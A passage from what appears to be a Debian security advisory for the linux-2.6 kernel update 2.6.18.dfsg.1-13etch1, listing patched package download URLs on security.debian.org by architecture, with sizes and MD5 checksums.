http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\r\n Size/MD5 checksum: 15238676 d62ddc5e61a35e84529262c9101b0e93\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\r\n Size/MD5 checksum: 15256142 8b0667dd7cb043b753ce3a9770058515\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\r\n Size/MD5 checksum: 50618 0da191c5dcd2406d079f9aab3b4ca0a3\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\r\n Size/MD5 checksum: 50632 46cd39c06556d9bc465099cddb3c7f3d\r\n\r\n ARM architecture:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_arm.deb\r\n Size/MD5 checksum: 3346806 bc6581484d2364ccba4bbdb275072ecb\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_arm.deb\r\n Size/MD5 checksum: 50652 976339e33b567d816811d561dc575cc8\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-arm_2.6.18.dfsg.1-13etch1_arm.deb\r\n Size/MD5 checksum: 50694 19473ef72c0109f1ce9dc9dfd4f3de3d\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-footbridge_2.6.18.dfsg.1-13etch1_arm.deb\r\n Size/MD5 checksum: 225038 969f487c6c9d50fef7200e0a3ecb5c4b\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-iop32x_2.6.18.dfsg.1-13etch1_arm.deb\r\n Size/MD5 checksum: 226564 c5f03ec763dfb6b27d00f8f90e0ae9da\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-ixp4xx_2.6.18.dfsg.1-13etch1_arm.deb\r\n Size/MD5 checksum: 232748 bb9606e416b2aa84c3cc8071ac2350d8\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-rpc_2.6.18.dfsg.1-13etch1_arm.deb\r\n Size/MD5 checksum: 192126 cd01397be860265e013d55aa574c7347\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-s3c2410_2.6.18.dfsg.1-13etch1_arm.deb\r\n Size/MD5 checksum: 194764 e05a0715a2bf9cbac171217b22314b19\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-footbridge_2.6.18.dfsg.1-13etch1_arm.deb\r\n Size/MD5 checksum: 7518754 018e9a847ff04f7fc3580f85bfc2abe1\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-iop32x_2.6.18.dfsg.1-13etch1_arm.deb\r\n Size/MD5 checksum: 7869416 e4750e15d602443f08ba02c7e7c2a137\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-ixp4xx_2.6.18.dfsg.1-13etch1_arm.deb\r\n Size/MD5 checksum: 8806748 7436ed2118660e9c7f4f4697ac5868c3\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-rpc_2.6.18.dfsg.1-13etch1_arm.deb\r\n Size/MD5 checksum: 4558510 68d071f5a09c182509bea873aef02105\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s3c2410_2.6.18.dfsg.1-13etch1_arm.deb\r\n Size/MD5 checksum: 4981066 6c261104c98cc528d6633f79274ad72a\r\n\r\n HP Precision architecture:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_hppa.deb\r\n Size/MD5 checksum: 2964238 f6fd8c5dd6071370f953e496756851cf\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_hppa.deb\r\n Size/MD5 checksum: 50642 8aca6d6bffa3b334b71b66332dd125ae\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-hppa_2.6.18.dfsg.1-13etch1_hppa.deb\r\n Size/MD5 checksum: 50668 7dfc3cbdd0f0763008e0246015fe5c9f\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc_2.6.18.dfsg.1-13etch1_hppa.deb\r\n Size/MD5 checksum: 188488 31502e1f9bdcc0a24d6a7762f6f4cbe8\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc-smp_2.6.18.dfsg.1-13etch1_hppa.deb\r\n Size/MD5 checksum: 189420 e6deaa2c4a398b59a40a732cb9018940\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc64_2.6.18.dfsg.1-13etch1_hppa.deb\r\n Size/MD5 checksum: 189146 133d151b9aa064b61c90c0c9ce20656c\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc64-smp_2.6.18.dfsg.1-13etch1_hppa.deb\r\n Size/MD5 checksum: 189834 c7ada740b1647894ceda503d4ee8399b\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc_2.6.18.dfsg.1-13etch1_hppa.deb\r\n Size/MD5 checksum: 10498710 5d3ee84cc71a57eabe1d0647f704ad3c\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc-smp_2.6.18.dfsg.1-13etch1_hppa.deb\r\n Size/MD5 checksum: 10940810 8e1de20ffcc7df26862544af83f78771\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc64_2.6.18.dfsg.1-13etch1_hppa.deb\r\n Size/MD5 checksum: 11344516 a6fe777a6d6296c1d95c81c25931102e\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc64-smp_2.6.18.dfsg.1-13etch1_hppa.deb\r\n Size/MD5 checksum: 11751450 e0c73577059ad7ee24893278e8bb580c\r\n\r\n Intel IA-32 architecture:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 3164474 5581e6b60de382087f4e3cd05a326cd8\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-486_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 277248 ff8b78d10cb79fc1c9258cd43a408499\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-686_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 275932 874d04ecd1f692d9781e2cb47c687ee6\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-686-bigmem_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 276286 dbcc90161edc6a46b7a89a10b0fc22ff\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 50640 34b3065eb0fdc3a02576c9ebdd2508d9\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-i386_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 50700 77d1ae15ad63b7e9675225a6ca7db47c\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-amd64_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 268294 a60191beaaf0d62099dbd1a20eaf6b75\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-k7_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 275830 f9a83308d8ecd6eb36d6791b864116c5\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 3050892 8283afde8651de38ff35c68ac9d34feb\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 273688 759941012b1848db94e34d6f1c57cfd6\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-k7_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 273764 bc27c920b5a85c643d3f9a7fa3bb2f9f\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 3145220 f0cee6bc58f389ef78fc3cbcad757197\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 270550 b1aca209d3f63334b8512bd70e7fee04\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 3167356 72a44aac33deb66d1eed41b37d9f6f84\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 271130 cebd78501825a595f992a575371cd8b7\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-486_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 16170152 7dbf8514bc38e86a6d6454593628a9a8\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-686_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 16319248 a099f9f04a33385dc29a7cc5ed743411\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-686-bigmem_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 16384438 83d05912745de976a2648295241f0b15\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-amd64_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 16816198 1c14cd0e4867b12f05bea602a7940b11\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-k7_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 16449650 9c195ec1b9f2b5f2531017389234d817\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 16358054 727d0f2e6e821a34c527c44946660653\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-k7_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 16488812 1619800305c3c55e48f9b5484cd7ec39\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 1296346 6f233c2b69738b9d577a4c1d7d9283a3\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 1323270 c3ba3e1299340fe9666746ada15cafe2\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 14258314 37215c1b602209320153136ddae5b53d\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 14272088 00cfea4d19109eff959c360f63b90c18\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 50620 3d60ebbd894ac77ddaafaaba903083b8\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb\r\n Size/MD5 checksum: 50636 9277c97ebb5c14fc93c5449c5e5a391c\r\n\r\n Intel IA-64 architecture:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_ia64.deb\r\n Size/MD5 checksum: 3078390 7c1dc7cf08fdce40fdb01acd14c6167b\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_ia64.deb\r\n Size/MD5 checksum: 50644 4303c1255e6d4840b9ce34b8da158125\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-ia64_2.6.18.dfsg.1-13etch1_ia64.deb\r\n Size/MD5 checksum: 50662 5235fb30a8f35c91ea15335ee439a60d\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-itanium_2.6.18.dfsg.1-13etch1_ia64.deb\r\n Size/MD5 checksum: 251576 5b89eeb214501b0a1b6e2d2712763fe3\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-mckinley_2.6.18.dfsg.1-13etch1_ia64.deb\r\n Size/MD5 checksum: 251558 573aa9cc9fba9924a98a1b6ca786edfe\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-itanium_2.6.18.dfsg.1-13etch1_ia64.deb\r\n Size/MD5 checksum: 28008514 baaf3f87d60cb1d68c361cea849d3c27\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-mckinley_2.6.18.dfsg.1-13etch1_ia64.deb\r\n Size/MD5 checksum: 28178022 c6cb8de82903383b78c7a9646d7df7da\r\n\r\n Big endian MIPS architecture:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_mips.deb\r\n Size/MD5 checksum: 3346354 c0c5d438a80a114ffbe515104f44785f\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_mips.deb\r\n Size/MD5 checksum: 50644 822db9efc5caba5bd3f96c2ffef90ce8\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-mips_2.6.18.dfsg.1-13etch1_mips.deb\r\n Size/MD5 checksum: 50692 9fbd9cb53ce75b25243adfb5568bd2f9\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mips.deb\r\n Size/MD5 checksum: 146348 4a2ede92f7cba5e409a01504a5787786\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r4k-ip22_2.6.18.dfsg.1-13etch1_mips.deb\r\n Size/MD5 checksum: 156600 b56c8fe624757cca08eafda9a7b62122\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r5k-ip32_2.6.18.dfsg.1-13etch1_mips.deb\r\n Size/MD5 checksum: 160930 14710075883c5cb17ed1f4dfa854461f\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mips.deb\r\n Size/MD5 checksum: 179380 f61160dd2e459a70170e5ba8524aea36\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mips.deb\r\n Size/MD5 checksum: 179154 aba921bcc75c80c0c96c727eac34afaf\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mips.deb\r\n Size/MD5 checksum: 6090314 99e9641ce38b6d0530199ad566738d73\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r4k-ip22_2.6.18.dfsg.1-13etch1_mips.deb\r\n Size/MD5 checksum: 8271518 6979492cd1b01cf3b76958211bfb3bdf\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r5k-ip32_2.6.18.dfsg.1-13etch1_mips.deb\r\n Size/MD5 checksum: 9037182 56824fbbc825d14d2fec62b2562f44ce\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mips.deb\r\n Size/MD5 checksum: 15636546 85bc62cca019e5d5c07374fe4ea05df8\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mips.deb\r\n Size/MD5 checksum: 15608670 233369e78b74fdca2143c971995440f5\r\n\r\n Little endian MIPS architecture:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_mipsel.deb\r\n Size/MD5 checksum: 3346628 a208480b2fa7bdd13559b4078d03cac9\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_mipsel.deb\r\n Size/MD5 checksum: 50648 20d1bf2c345a889720562597f9300152\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-mipsel_2.6.18.dfsg.1-13etch1_mipsel.deb\r\n Size/MD5 checksum: 50712 31666ed837cac8aec136528616a7407f\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mipsel.deb\r\n Size/MD5 checksum: 146012 ec774ccba8d1783239b0f12cee90abe3\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r3k-kn02_2.6.18.dfsg.1-13etch1_mipsel.deb\r\n Size/MD5 checksum: 152252 99657c9b655c5f1bded07e4a5394d132\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r4k-kn04_2.6.18.dfsg.1-13etch1_mipsel.deb\r\n Size/MD5 checksum: 152340 0c0778fa59bda664f8cb4f0f1ba8f90b\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r5k-cobalt_2.6.18.dfsg.1-13etch1_mipsel.deb\r\n Size/MD5 checksum: 174444 8927ed0b8d880d99fcc79c64ecc44c54\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mipsel.deb\r\n Size/MD5 checksum: 179284 8b01ba01c4d2e0e4a1dbfd4acd5354ea\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mipsel.deb\r\n Size/MD5 checksum: 179144 368da689abd47ca70aced24efec5b040\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mipsel.deb\r\n Size/MD5 checksum: 6025698 a355ec38f440f7e08d0f22ce6184bcf8\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r3k-kn02_2.6.18.dfsg.1-13etch1_mipsel.deb\r\n Size/MD5 checksum: 5937952 2de36f1fdeb55373eb50fb77efe7f938\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r4k-kn04_2.6.18.dfsg.1-13etch1_mipsel.deb\r\n Size/MD5 checksum: 5921402 006d6d3d34f2db5b21500cdc8914dc08\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r5k-cobalt_2.6.18.dfsg.1-13etch1_mipsel.deb\r\n Size/MD5 checksum: 9857018 4246c3b15aae0df84b669381a8f1383e\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mipsel.deb\r\n Size/MD5 checksum: 15052960 317130eff4221493bf31349bb99d0eab\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mipsel.deb\r\n Size/MD5 checksum: 15019204 a5c6e183ff53d3c8fd169f0d2bc17ebc\r\n\r\n PowerPC architecture:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_powerpc.deb\r\n Size/MD5 checksum: 3388916 6d6415c4241ea26786fd3a72899e266f\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_powerpc.deb\r\n Size/MD5 checksum: 50652 f19e0ad61b5e91f685e920a58248c8e9\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb\r\n Size/MD5 checksum: 50698 111c11da4f26a93122b76b6eac5b92c8\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb\r\n Size/MD5 checksum: 248366 7bafbd435e00ad6b647b347d84e1e0c1\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc-miboot_2.6.18.dfsg.1-13etch1_powerpc.deb\r\n Size/MD5 checksum: 225218 90e19db35ef618a7e3f476576de60d95\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc-smp_2.6.18.dfsg.1-13etch1_powerpc.deb\r\n Size/MD5 checksum: 248400 3dd8373a35220a27423c3f4eadd32358\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb\r\n Size/MD5 checksum: 248712 8a0281e9b856372f4d01c8a0f4b02d72\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-prep_2.6.18.dfsg.1-13etch1_powerpc.deb\r\n Size/MD5 checksum: 242934 92f3fda2938f60fdf6f957f0659712ab\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_powerpc.deb\r\n Size/MD5 checksum: 3411216 b9070329bf0a6045896db2fc15f66f0a\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb\r\n Size/MD5 checksum: 248448 e108e05b4fe2239d4e95fb6598405fd6\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb\r\n Size/MD5 checksum: 249006 3908dfaf4f518192bd550ca5ac45476f\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb\r\n Size/MD5 checksum: 16623606 b76fa67819092073c6bfc51904163278\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc-miboot_2.6.18.dfsg.1-13etch1_powerpc.deb\r\n Size/MD5 checksum: 15149270 502237df8e0f90e7ab95b28cbe7a5f8f\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc-smp_2.6.18.dfsg.1-13etch1_powerpc.deb\r\n Size/MD5 checksum: 16960668 69f13fe8bde671497363849f76636eda\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb\r\n Size/MD5 checksum: 18291108 9cc68d73b1bcf401176d1f93bd1dfeb1\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-prep_2.6.18.dfsg.1-13etch1_powerpc.deb\r\n Size/MD5 checksum: 16395670 fbab6e355aba9c29f63603d097855c5e\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb\r\n Size/MD5 checksum: 17006732 cca0573ca442e02ad6f153fcc059f734\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb\r\n Size/MD5 checksum: 18340518 3940b166f8b0464baa118c8557922edb\r\n\r\n IBM S/390 architecture:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_s390.deb\r\n Size/MD5 checksum: 2939624 fada85c4d5ec9cbdee803116fde561b1\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_s390.deb\r\n Size/MD5 checksum: 50642 9478b247c93b2ba8b405f93b525307ae\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-s390_2.6.18.dfsg.1-13etch1_s390.deb\r\n Size/MD5 checksum: 50664 d694fdeff900e5b1ba575ad15bbd5310\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-s390_2.6.18.dfsg.1-13etch1_s390.deb\r\n Size/MD5 checksum: 139294 02bcbe57d1b62129243c8cb4b7bb8d2d\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-s390x_2.6.18.dfsg.1-13etch1_s390.deb\r\n Size/MD5 checksum: 139538 69993d0e2867ed4efa5bb0e442d3d014\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_s390.deb\r\n Size/MD5 checksum: 2962698 36d89e72ac15117d15a3488878d205a4\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-s390x_2.6.18.dfsg.1-13etch1_s390.deb\r\n Size/MD5 checksum: 140274 5b8bacca256347a7ce02783651110e35\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s390_2.6.18.dfsg.1-13etch1_s390.deb\r\n Size/MD5 checksum: 5398576 b1054f70f0472fd020241b6af904438d\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s390-tape_2.6.18.dfsg.1-13etch1_s390.deb\r\n Size/MD5 checksum: 1435060 daf41750946017171aad603b9218d0c4\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s390x_2.6.18.dfsg.1-13etch1_s390.deb\r\n Size/MD5 checksum: 5613112 68d67210c4c6aa0ea54b1754df137d8e\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-s390x_2.6.18.dfsg.1-13etch1_s390.deb\r\n Size/MD5 checksum: 5659570 c6a2db3553a427cecf69d9f1258e9444\r\n\r\n Sun Sparc architecture:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_sparc.deb\r\n Size/MD5 checksum: 3164578 902a8ff3089225278575251ba13f1f98\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_sparc.deb\r\n Size/MD5 checksum: 50640 455bd9863c6f183ee28d15e7ba9ddc38\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-sparc_2.6.18.dfsg.1-13etch1_sparc.deb\r\n Size/MD5 checksum: 50674 8416d5c20659923183729457854e139f\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sparc32_2.6.18.dfsg.1-13etch1_sparc.deb\r\n Size/MD5 checksum: 161886 f58a554b0de7e05c4727bff1e236a069\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb\r\n Size/MD5 checksum: 191010 bad7bf07af89b1ba54ff559f99cf3d1b\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sparc64-smp_2.6.18.dfsg.1-13etch1_sparc.deb\r\n Size/MD5 checksum: 191776 f059b7c75ea312f69758d02e6da4cd4f\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_sparc.deb\r\n Size/MD5 checksum: 3186936 2a865cc6aed95cdc0ed3ebb20ec0a6d0\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb\r\n Size/MD5 checksum: 192172 197b2cd91975cbda876bc0ac18244870\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sparc32_2.6.18.dfsg.1-13etch1_sparc.deb\r\n Size/MD5 checksum: 6406184 e0ce977a5c79906c4996f069672e272b\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb\r\n Size/MD5 checksum: 10351700 69bc68d296d9134f6df792fb745c9810\r\n 